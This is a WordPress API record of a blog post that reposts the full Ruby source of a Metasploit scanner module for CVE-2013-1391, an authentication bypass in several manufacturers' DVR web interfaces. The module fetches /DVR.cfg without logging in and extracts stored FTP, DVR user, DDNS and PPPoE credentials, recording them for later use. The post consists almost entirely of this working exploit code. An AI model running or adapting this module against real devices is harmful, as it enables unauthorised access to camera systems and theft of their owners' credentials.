{"id":59378,"date":"2024-09-01T22:40:04","date_gmt":"2024-09-01T19:40:04","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181211\/dvr_config_disclosure.rb.txt"},"modified":"2024-09-01T22:40:04","modified_gmt":"2024-09-01T19:40:04","slug":"multiple-dvr-manufacturers-configuration-disclosure","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/multiple-dvr-manufacturers-configuration-disclosure\/","title":{"rendered":"Multiple DVR Manufacturers Configuration Disclosure"},"content":{"rendered":"

##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner<\/p>\n

def initialize
super(
‘Name’ => ‘Multiple DVR Manufacturers Configuration Disclosure’,
‘Description’ => %q{
This module takes advantage of an authentication bypass vulnerability at the
web interface of multiple manufacturers DVR systems, which allows to retrieve the
device configuration.
},
‘Author’ =>
[
‘Alejandro Ramos’, # Vulnerability Discovery
‘juan vazquez’ # Metasploit module
],
‘References’ =>
[
[ ‘CVE’, ‘2013-1391’ ],
[ ‘URL’, ‘http:\/\/www.securitybydefault.com\/2013\/01\/12000-grabadores-de-video-expuestos-en.html’ ]],
‘License’ => MSF_LICENSE
)<\/p>\n

end<\/p>\n

def get_pppoe_credentials(conf)<\/p>\n

user = “”
password = “”
enabled = “”<\/p>\n

if conf =~ \/PPPOE_EN=(\\d)\/
enabled = $1
end<\/p>\n

return if enabled == “0”<\/p>\n

if conf =~ \/PPPOE_USER=(.*)\/
user = $1
end<\/p>\n

if conf =~ \/PPPOE_PASSWORD=(.*)\/
password = $1
end<\/p>\n

if user.empty? or password.empty?
return
end<\/p>\n

info = “PPPOE credentials for #{rhost}, user: #{user}, password: #{password}”<\/p>\n

report_note({
:host => rhost,
:data => info,
:type => “dvr.pppoe.conf”,
:sname => ‘pppoe’,
:update => :unique_data
})<\/p>\n

end<\/p>\n

def get_ddns_credentials(conf)
hostname = “”
user = “”
password = “”
enabled = “”<\/p>\n

if conf =~ \/DDNS_EN=(\\d)\/
enabled = $1
end<\/p>\n

return if enabled == “0”<\/p>\n

if conf =~ \/DDNS_HOSTNAME=(.*)\/
hostname = $1
end<\/p>\n

if conf =~ \/DDNS_USER=(.*)\/
user = $1
end<\/p>\n

if conf =~ \/DDNS_PASSWORD=(.*)\/
password = $1
end<\/p>\n

if hostname.empty?
return
end<\/p>\n

info = “DDNS credentials for #{hostname}, user: #{user}, password: #{password}”<\/p>\n

report_note({
:host => rhost,
:data => info,
:type => “dvr.ddns.conf”,
:sname => ‘ddns’,
:update => :unique_data
})<\/p>\n

end<\/p>\n

def get_ftp_credentials(conf)
server = “”
user = “”
password = “”
port = “”<\/p>\n

if conf =~ \/FTP_SERVER=(.*)\/
server = $1
end<\/p>\n

if conf =~ \/FTP_USER=(.*)\/
user = $1
end<\/p>\n

if conf =~ \/FTP_PASSWORD=(.*)\/
password = $1
end<\/p>\n

if conf =~ \/FTP_PORT=(.*)\/
port = $1
end<\/p>\n

if server.empty?
return
end<\/p>\n

report_cred(
ip: server,
port: port,
service_name: ‘ftp’,
user: user,
password: password,
proof: conf.inspect
)
end<\/p>\n

def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: ‘tcp’,
workspace_id: myworkspace_id
}<\/p>\n

credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)<\/p>\n

login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
proof: opts[:proof]}.merge(service_data)<\/p>\n

create_credential_login(login_data)
end<\/p>\n

def get_dvr_credentials(conf)
conf.scan(\/USER(\\d+)_USERNAME\/).each { |match|
user = “”
password = “”
active = “”<\/p>\n

user_id = match[0]\n

if conf =~ \/USER#{user_id}_LOGIN=(.*)\/
active = $1
end<\/p>\n

if conf =~ \/USER#{user_id}_USERNAME=(.*)\/
user = $1
end<\/p>\n

if conf =~ \/USER#{user_id}_PASSWORD=(.*)\/
password = $1
end<\/p>\n

if active == “0”
user_active = false
else
user_active = true
end<\/p>\n

report_cred(
ip: rhost,
port: rport,
service_name: ‘dvr’,
user: user,
password: password,
proof: “user_id: #{user_id}, active: #{active}”
)
}
end<\/p>\n

def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: ‘tcp’,
workspace_id: myworkspace_id
}<\/p>\n

credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)<\/p>\n

login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
proof: opts[:proof]}.merge(service_data)<\/p>\n

create_credential_login(login_data)
end<\/p>\n

def run_host(ip)<\/p>\n

res = send_request_cgi({
‘uri’ => ‘\/DVR.cfg’,
‘method’ => ‘GET’
})<\/p>\n

if not res or res.code != 200 or res.body.empty? or res.body !~ \/CAMERA\/
vprint_error(“#{rhost}:#{rport} – DVR configuration not found”)
return
end<\/p>\n

p = store_loot(“dvr.configuration”, “text\/plain”, rhost, res.body, “DVR.cfg”)
vprint_good(“#{rhost}:#{rport} – DVR configuration stored in #{p}”)<\/p>\n

conf = res.body<\/p>\n

get_ftp_credentials(conf)
get_dvr_credentials(conf)
get_ddns_credentials(conf)
get_pppoe_credentials(conf)<\/p>\n

dvr_name = “”
if res.body =~ \/DVR_NAME=(.*)\/
dvr_name = $1
end<\/p>\n

report_service(:host => rhost, :port => rport, :sname => ‘dvr’, :info => “DVR NAME: #{dvr_name}”)
print_good(“#{rhost}:#{rport} DVR #{dvr_name} found”)
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"

### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Auxiliaryinclude Msf::Exploit::Remote::HttpClientinclude Msf::Auxiliary::Reportinclude Msf::Auxiliary::Scanner def initializesuper(‘Name’ => ‘Multiple DVR Manufacturers Configuration Disclosure’,‘Description’ => %q{This module takes advantage of an authentication bypass vulnerability at theweb interface of multiple manufacturers DVR systems, which allows to retrieve thedevice configuration.},‘Author’ =>[‘Alejandro Ramos’, # Vulnerability Discovery‘juan vazquez’ # …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59378","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59378","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59378"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59378\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59378"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59378"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59378"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}